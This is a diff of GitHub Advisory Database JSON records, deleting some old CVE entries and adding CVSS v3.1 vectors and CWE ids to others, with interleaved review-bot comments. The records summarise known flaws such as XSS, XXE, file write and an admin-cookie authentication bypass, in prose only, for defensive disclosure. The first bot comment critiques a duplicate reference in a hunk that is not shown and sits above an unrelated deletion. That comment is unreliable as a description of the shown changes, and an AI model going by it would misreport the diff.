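Review bot: The added reference `https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZXCI33HXH6YSOGC2LPE2REQLMIDH6US4/` duplicates the existing entry immediately below it, differing only in `%40` versus `@`; the sync step is comparing URLs byte-for-byte rather than after percent-decoding, so GHSA-867w-fmxg-m2g8 now lists the same Fedora announcement twice. I would drop the four added lines for that entry, or decode `%40` before the duplicate check, while keeping the `https://security.gentoo.org/glsa/202401-32` addition, which is genuinely new. The enclosing `references` array starts and ends outside this hunk.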
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-8864-pwhg-3mp2",
- "modified": "2022-05-14T03:05:26Z",
- "published": "2022-05-14T03:05:26Z",
- "aliases": [
- "CVE-2018-1000607"
- ],
- "details": "A arbitrary file write vulnerability exists in Jenkins Fortify CloudScan Plugin 1.5.1 and earlier in ArchiveUtil.java that allows attackers able to control rulepack zip file contents to overwrite any file on the Jenkins master file system, only limited by the permissions of the user the Jenkins master process is running as.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000607"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2018-06-25/#SECURITY-870"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-20"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2018-06-26T17:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-89r5-2fhc-hwj7/GHSA-89r5-2fhc-hwj7.json b/advisories/unreviewed/2022/05/GHSA-89r5-2fhc-hwj7/GHSA-89r5-2fhc-hwj7.json
index fab4daea5d31b..5203dbe0a88d2 100644
--- a/advisories/unreviewed/2022/05/GHSA-89r5-2fhc-hwj7/GHSA-89r5-2fhc-hwj7.json
+++ b/advisories/unreviewed/2022/05/GHSA-89r5-2fhc-hwj7/GHSA-89r5-2fhc-hwj7.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-89r5-2fhc-hwj7",
- "modified": "2022-05-02T03:49:44Z",
+ "modified": "2024-02-08T15:30:26Z",
 "published": "2022-05-02T03:49:44Z",
 "aliases": [
 "CVE-2009-3897"
 ],
 "details": "Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
 ],
 "affected": [
@@ -69,7 +72,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-732"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-8jx9-7j5m-79x4/GHSA-8jx9-7j5m-79x4.json b/advisories/unreviewed/2022/05/GHSA-8jx9-7j5m-79x4/GHSA-8jx9-7j5m-79x4.json
deleted file mode 100644
index ceae3147bc462..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-8jx9-7j5m-79x4/GHSA-8jx9-7j5m-79x4.json
+++ /dev/null
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-8jx9-7j5m-79x4",
- "modified": "2022-05-13T01:40:54Z",
- "published": "2022-05-13T01:40:54Z",
- "aliases": [
- "CVE-2017-1000089"
- ],
- "details": "Builds in Jenkins are associated with an authentication that controls the permissions that the build has to interact with other elements in Jenkins. The Pipeline: Build Step Plugin did not check the build authentication it was running as and allowed triggering any other project in Jenkins.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000089"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2017-07-10/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-276"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2017-10-05T01:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-8p42-r5f7-3m7g/GHSA-8p42-r5f7-3m7g.json b/advisories/unreviewed/2022/05/GHSA-8p42-r5f7-3m7g/GHSA-8p42-r5f7-3m7g.json
index f1bee7f702270..9f28f347aaea3 100644
--- a/advisories/unreviewed/2022/05/GHSA-8p42-r5f7-3m7g/GHSA-8p42-r5f7-3m7g.json
+++ b/advisories/unreviewed/2022/05/GHSA-8p42-r5f7-3m7g/GHSA-8p42-r5f7-3m7g.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-8p42-r5f7-3m7g",
- "modified": "2022-05-01T02:04:59Z",
+ "modified": "2024-02-02T15:30:27Z",
 "published": "2022-05-01T02:04:59Z",
 "aliases": [
 "CVE-2005-2103"
 ],
 "details": "Buffer overflow in the AIM and ICQ module in Gaim before 1.5.0 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via an away message with a large number of AIM substitution strings, such as %t or %n.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -53,7 +56,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-131"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-8rc4-3jc3-83pm/GHSA-8rc4-3jc3-83pm.json b/advisories/unreviewed/2022/05/GHSA-8rc4-3jc3-83pm/GHSA-8rc4-3jc3-83pm.json
deleted file mode 100644
index cf788b674ef2b..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-8rc4-3jc3-83pm/GHSA-8rc4-3jc3-83pm.json
+++ /dev/null
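Review bot: The CVSS v3.1 vector added to GHSA-8p42-r5f7-3m7g, `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`, scores 9.8 (Critical on the v3.1 qualitative scale), yet the unchanged context line in the second hunk still reads `"severity": "HIGH"`, so the record now carries two severity signals that disagree. If the database_specific label is meant to track the score, it should become `"severity": "CRITICAL"`; otherwise the vector deserves a second look. The same score-versus-label gap appears in GHSA-9g7f-gmj5-mxvq (9.8 against `HIGH`) and, with a High-range score against a `MODERATE` label, in GHSA-8vrj-v84v-pmgx and GHSA-c6mp-g88m-3h4r (7.8) and GHSA-9q64-vqcr-hw99 (7.5). Consumers that filter on database_specific.severity will under-prioritise these entries relative to the score the commit adds.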
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-8rc4-3jc3-83pm",
- "modified": "2022-05-14T03:13:12Z",
- "published": "2022-05-14T03:13:12Z",
- "aliases": [
- "CVE-2018-1000198"
- ],
- "details": "A XML external entity processing vulnerability exists in Jenkins Black Duck Hub Plugin 3.1.0 and older in PostBuildScanDescriptor.java that allows attackers with Overall/Read permission to make Jenkins process XML eternal entities in an XML document.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000198"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2018-05-09/#SECURITY-671"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-611"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2018-06-05T21:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-8vpw-mgpf-mpvv/GHSA-8vpw-mgpf-mpvv.json b/advisories/unreviewed/2022/05/GHSA-8vpw-mgpf-mpvv/GHSA-8vpw-mgpf-mpvv.json
deleted file mode 100644
index 435b39f740891..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-8vpw-mgpf-mpvv/GHSA-8vpw-mgpf-mpvv.json
+++ /dev/null
@@ -1,51 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-8vpw-mgpf-mpvv",
- "modified": "2022-05-17T19:57:19Z",
- "published": "2022-05-17T19:57:19Z",
- "aliases": [
- "CVE-2014-9720"
- ],
- "details": "Tornado before 3.2.2 sends arbitrary responses that contain a fixed CSRF token and may be sent with HTTP compression, which makes it easier for remote attackers to conduct a BREACH attack and determine this token via a series of crafted requests.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9720"
- },
- {
- "type": "WEB",
- "url": "https://github.com/tornadoweb/tornado/commit/1c36307463b1e8affae100bf9386948e6c1b2308"
- },
- {
- "type": "WEB",
- "url": "https://bugzilla.novell.com/show_bug.cgi?id=930362"
- },
- {
- "type": "WEB",
- "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1222816"
- },
- {
- "type": "WEB",
- "url": "http://openwall.com/lists/oss-security/2015/05/19/4"
- },
- {
- "type": "WEB",
- "url": "http://www.tornadoweb.org/en/stable/releases/v3.2.2.html"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2020-01-24T18:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-8vrj-v84v-pmgx/GHSA-8vrj-v84v-pmgx.json b/advisories/unreviewed/2022/05/GHSA-8vrj-v84v-pmgx/GHSA-8vrj-v84v-pmgx.json
index 0c771cf21c130..a52abc8c418b9 100644
--- a/advisories/unreviewed/2022/05/GHSA-8vrj-v84v-pmgx/GHSA-8vrj-v84v-pmgx.json
+++ b/advisories/unreviewed/2022/05/GHSA-8vrj-v84v-pmgx/GHSA-8vrj-v84v-pmgx.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-8vrj-v84v-pmgx",
- "modified": "2022-05-02T03:45:33Z",
+ "modified": "2024-02-08T15:30:26Z",
 "published": "2022-05-02T03:45:33Z",
 "aliases": [
 "CVE-2009-3489"
 ],
 "details": "Adobe Photoshop Elements 8.0 installs the Adobe Active File Monitor V8 service with an insecure security descriptor, which allows local users to (1) stop the service via the stop command, (2) execute arbitrary commands as SYSTEM by using the config command to modify the binPath variable, or (3) restart the service via the start command.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -49,7 +52,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-732"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-92cv-wv2c-8899/GHSA-92cv-wv2c-8899.json b/advisories/unreviewed/2022/05/GHSA-92cv-wv2c-8899/GHSA-92cv-wv2c-8899.json
deleted file mode 100644
index 9ce1c0661ae2f..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-92cv-wv2c-8899/GHSA-92cv-wv2c-8899.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-92cv-wv2c-8899",
- "modified": "2022-05-17T05:50:42Z",
- "published": "2022-05-17T05:50:42Z",
- "aliases": [
- "CVE-2010-2086"
- ],
- "details": "Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2086"
- },
- {
- "type": "WEB",
- "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2010-001.txt"
- },
- {
- "type": "WEB",
- "url": "http://www.blackhat.com/presentations/bh-dc-10/Byrne_David/BlackHat-DC-2010-Byrne-SGUI-slides.pdf"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2010-05-27T19:00:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-966m-m549-2878/GHSA-966m-m549-2878.json b/advisories/unreviewed/2022/05/GHSA-966m-m549-2878/GHSA-966m-m549-2878.json
deleted file mode 100644
index d25a3d0a99fc0..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-966m-m549-2878/GHSA-966m-m549-2878.json
+++ /dev/null
@@ -1,47 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-966m-m549-2878",
- "modified": "2022-05-13T01:13:08Z",
- "published": "2022-05-13T01:13:08Z",
- "aliases": [
- "CVE-2010-1616"
- ],
- "details": "Moodle 1.8.x and 1.9.x before 1.9.8 can create new roles when restoring a course, which allows teachers to create new accounts even if they do not have the moodle/user:create capability.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-1616"
- },
- {
- "type": "WEB",
- "url": "http://lists.opensuse.org/opensuse-security-announce/2010-05/msg00001.html"
- },
- {
- "type": "WEB",
- "url": "http://moodle.org/security/"
- },
- {
- "type": "WEB",
- "url": "http://tracker.moodle.org/browse/MDL-16658"
- },
- {
- "type": "WEB",
- "url": "http://www.vupen.com/english/advisories/2010/1107"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2010-04-29T21:30:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-96r9-hr2x-h9g7/GHSA-96r9-hr2x-h9g7.json b/advisories/unreviewed/2022/05/GHSA-96r9-hr2x-h9g7/GHSA-96r9-hr2x-h9g7.json
index 0f1d4330e9949..b938b0dc194ee 100644
--- a/advisories/unreviewed/2022/05/GHSA-96r9-hr2x-h9g7/GHSA-96r9-hr2x-h9g7.json
+++ b/advisories/unreviewed/2022/05/GHSA-96r9-hr2x-h9g7/GHSA-96r9-hr2x-h9g7.json
@@ -40,7 +40,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-200"
+ "CWE-200",
+ "CWE-697"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-9c2p-99pg-c4j9/GHSA-9c2p-99pg-c4j9.json b/advisories/unreviewed/2022/05/GHSA-9c2p-99pg-c4j9/GHSA-9c2p-99pg-c4j9.json
deleted file mode 100644
index 481d84ddfd39d..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-9c2p-99pg-c4j9/GHSA-9c2p-99pg-c4j9.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-9c2p-99pg-c4j9",
- "modified": "2022-05-17T00:29:01Z",
- "published": "2022-05-17T00:29:01Z",
- "aliases": [
- "CVE-2017-1000102"
- ],
- "details": "The Details view of some Static Analysis Utilities based plugins, was vulnerable to a persisted cross-site scripting vulnerability: Malicious users able to influence the input to these plugins, for example the console output which is parsed to extract build warnings (Warnings Plugin), could insert arbitrary HTML into this view.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000102"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2017-08-07/"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/101061"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2017-10-05T01:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-9g7f-gmj5-mxvq/GHSA-9g7f-gmj5-mxvq.json b/advisories/unreviewed/2022/05/GHSA-9g7f-gmj5-mxvq/GHSA-9g7f-gmj5-mxvq.json
index 88bfeedff05fa..06b5827514d9b 100644
--- a/advisories/unreviewed/2022/05/GHSA-9g7f-gmj5-mxvq/GHSA-9g7f-gmj5-mxvq.json
+++ b/advisories/unreviewed/2022/05/GHSA-9g7f-gmj5-mxvq/GHSA-9g7f-gmj5-mxvq.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9g7f-gmj5-mxvq",
- "modified": "2022-05-17T00:42:56Z",
+ "modified": "2024-02-08T03:32:44Z",
 "published": "2022-05-17T00:42:56Z",
 "aliases": [
 "CVE-2008-5784"
 ],
 "details": "V3 Chat - Profiles/Dating Script 3.0.2 allows remote attackers to bypass authentication and gain administrative access by setting the admin cookie to 1.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -41,7 +44,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-287"
+ "CWE-287",
+ "CWE-565"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-9hh2-8cw6-hfv7/GHSA-9hh2-8cw6-hfv7.json b/advisories/unreviewed/2022/05/GHSA-9hh2-8cw6-hfv7/GHSA-9hh2-8cw6-hfv7.json
deleted file mode 100644
index b3f6538862c27..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-9hh2-8cw6-hfv7/GHSA-9hh2-8cw6-hfv7.json
+++ /dev/null
@@ -1,63 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-9hh2-8cw6-hfv7",
- "modified": "2022-05-17T01:55:58Z",
- "published": "2022-05-17T01:55:58Z",
- "aliases": [
- "CVE-2010-5100"
- ],
- "details": "Multiple cross-site scripting (XSS) vulnerabilities in the Install Tool in TYPO3 4.2.x before 4.2.16, 4.3.x before 4.3.9, and 4.4.x before 4.4.5 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-5100"
- },
- {
- "type": "WEB",
- "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64181"
- },
- {
- "type": "WEB",
- "url": "http://secunia.com/advisories/35770"
- },
- {
- "type": "WEB",
- "url": "http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-sa-2010-022/"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2011/01/13/2"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2012/05/10/7"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2012/05/11/3"
- },
- {
- "type": "WEB",
- "url": "http://www.osvdb.org/70120"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/45470"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "LOW",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2012-05-21T20:55:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-9hv8-4frf-cprf/GHSA-9hv8-4frf-cprf.json b/advisories/unreviewed/2022/05/GHSA-9hv8-4frf-cprf/GHSA-9hv8-4frf-cprf.json
deleted file mode 100644
index 5cbd9ff9bd7b3..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-9hv8-4frf-cprf/GHSA-9hv8-4frf-cprf.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-9hv8-4frf-cprf",
- "modified": "2022-05-24T17:18:56Z",
- "published": "2022-05-24T17:18:56Z",
- "aliases": [
- "CVE-2018-18624"
- ],
- "details": "Grafana 5.3.1 has XSS via a column style on the \"Dashboard > Table Panel\" screen. NOTE: this issue exists because of an incomplete fix for CVE-2018-12099.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-18624"
- },
- {
- "type": "WEB",
- "url": "https://github.com/grafana/grafana/pull/11813"
- },
- {
- "type": "WEB",
- "url": "https://security.netapp.com/advisory/ntap-20200608-0008/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2020-06-02T17:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-9hw3-4gvp-8mv5/GHSA-9hw3-4gvp-8mv5.json b/advisories/unreviewed/2022/05/GHSA-9hw3-4gvp-8mv5/GHSA-9hw3-4gvp-8mv5.json
deleted file mode 100644
index 29511ccf21fd4..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-9hw3-4gvp-8mv5/GHSA-9hw3-4gvp-8mv5.json
+++ /dev/null
@@ -1,67 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-9hw3-4gvp-8mv5",
- "modified": "2022-05-17T01:55:59Z",
- "published": "2022-05-17T01:55:59Z",
- "aliases": [
- "CVE-2010-5097"
- ],
- "details": "Cross-site scripting (XSS) vulnerability in the click enlarge functionality in TYPO3 4.3.x before 4.3.9 and 4.4.x before 4.4.5 when the caching framework is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-5097"
- },
- {
- "type": "WEB",
- "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64178"
- },
- {
- "type": "WEB",
- "url": "http://secunia.com/advisories/35770"
- },
- {
- "type": "WEB",
- "url": "http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-sa-2010-022/"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2011/01/13/2"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2012/05/10/7"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2012/05/11/3"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2012/05/12/5"
- },
- {
- "type": "WEB",
- "url": "http://www.osvdb.org/70123"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/45470"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "LOW",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2012-05-21T20:55:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-9j34-5qgm-c4jh/GHSA-9j34-5qgm-c4jh.json b/advisories/unreviewed/2022/05/GHSA-9j34-5qgm-c4jh/GHSA-9j34-5qgm-c4jh.json
index 8bc956c0d611c..cc893ebb96eeb 100644
--- a/advisories/unreviewed/2022/05/GHSA-9j34-5qgm-c4jh/GHSA-9j34-5qgm-c4jh.json
+++ b/advisories/unreviewed/2022/05/GHSA-9j34-5qgm-c4jh/GHSA-9j34-5qgm-c4jh.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9j34-5qgm-c4jh",
- "modified": "2022-05-13T01:24:52Z",
+ "modified": "2024-02-02T03:30:31Z",
 "published": "2022-05-13T01:24:52Z",
 "aliases": [
 "CVE-2010-4577"
 ],
 "details": "The CSSParser::parseFontFaceSrc function in WebCore/css/CSSParser.cpp in WebKit, as used in Google Chrome before 8.0.552.224, Chrome OS before 8.0.552.343, webkitgtk before 1.2.6, and other products does not properly parse Cascading Style Sheets (CSS) token sequences, which allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted local font, related to \"Type Confusion.\"",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
 ],
 "affected": [
diff --git a/advisories/unreviewed/2022/05/GHSA-9jqm-gvwx-9wxq/GHSA-9jqm-gvwx-9wxq.json b/advisories/unreviewed/2022/05/GHSA-9jqm-gvwx-9wxq/GHSA-9jqm-gvwx-9wxq.json
index 422c99d048e4f..fe2069c476f7b 100644
--- a/advisories/unreviewed/2022/05/GHSA-9jqm-gvwx-9wxq/GHSA-9jqm-gvwx-9wxq.json
+++ b/advisories/unreviewed/2022/05/GHSA-9jqm-gvwx-9wxq/GHSA-9jqm-gvwx-9wxq.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9jqm-gvwx-9wxq",
- "modified": "2022-05-01T18:20:17Z",
+ "modified": "2024-02-08T21:30:31Z",
 "published": "2022-05-01T18:20:17Z",
 "aliases": [
 "CVE-2007-4103"
 ],
 "details": "The IAX2 channel driver (chan_iax2) in Asterisk Open 1.2.x before 1.2.23, 1.4.x before 1.4.9, and Asterisk Appliance Developer Kit before 0.6.0, when configured to allow unauthenticated calls, allows remote attackers to cause a denial of service (resource exhaustion) via a flood of calls that do not complete a 3-way handshake, which causes an ast_channel to be allocated but not released.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
 ],
 "affected": [
@@ -65,7 +68,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-772"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-9jrh-hch8-rr5c/GHSA-9jrh-hch8-rr5c.json b/advisories/unreviewed/2022/05/GHSA-9jrh-hch8-rr5c/GHSA-9jrh-hch8-rr5c.json
deleted file mode 100644
index 330bc80677404..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-9jrh-hch8-rr5c/GHSA-9jrh-hch8-rr5c.json
+++ /dev/null
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-9jrh-hch8-rr5c",
- "modified": "2022-05-14T03:23:41Z",
- "published": "2022-05-14T03:23:41Z",
- "aliases": [
- "CVE-2018-1000148"
- ],
- "details": "An exposure of sensitive information vulnerability exists in Jenkins Copy To Slave Plugin version 1.4.4 and older in CopyToSlaveBuildWrapper.java that allows attackers with permission to configure jobs to read arbitrary files from the Jenkins master file system.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000148"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2018-03-26/#SECURITY-545"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-200"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2018-04-05T13:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-9q64-vqcr-hw99/GHSA-9q64-vqcr-hw99.json b/advisories/unreviewed/2022/05/GHSA-9q64-vqcr-hw99/GHSA-9q64-vqcr-hw99.json
index ee50560777da7..4add7b8fc8dee 100644
--- a/advisories/unreviewed/2022/05/GHSA-9q64-vqcr-hw99/GHSA-9q64-vqcr-hw99.json
+++ b/advisories/unreviewed/2022/05/GHSA-9q64-vqcr-hw99/GHSA-9q64-vqcr-hw99.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9q64-vqcr-hw99",
- "modified": "2022-05-01T18:11:57Z",
+ "modified": "2024-02-02T03:30:31Z",
 "published": "2022-05-01T18:11:57Z",
 "aliases": [
 "CVE-2007-3268"
 ],
 "details": "The TFTP implementation in IBM Tivoli Provisioning Manager for OS Deployment 5.1 before Fix Pack 3 allows remote attackers to cause a denial of service (rembo.exe crash and multiple service outage) via a read (RRQ) request with an invalid blksize (blocksize), which triggers a divide-by-zero error.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
 ],
 "affected": [
@@ -53,7 +56,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-369"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-9r2w-p922-mx3m/GHSA-9r2w-p922-mx3m.json b/advisories/unreviewed/2022/05/GHSA-9r2w-p922-mx3m/GHSA-9r2w-p922-mx3m.json
index 48c6c92db2ef5..11ef125391c07 100644
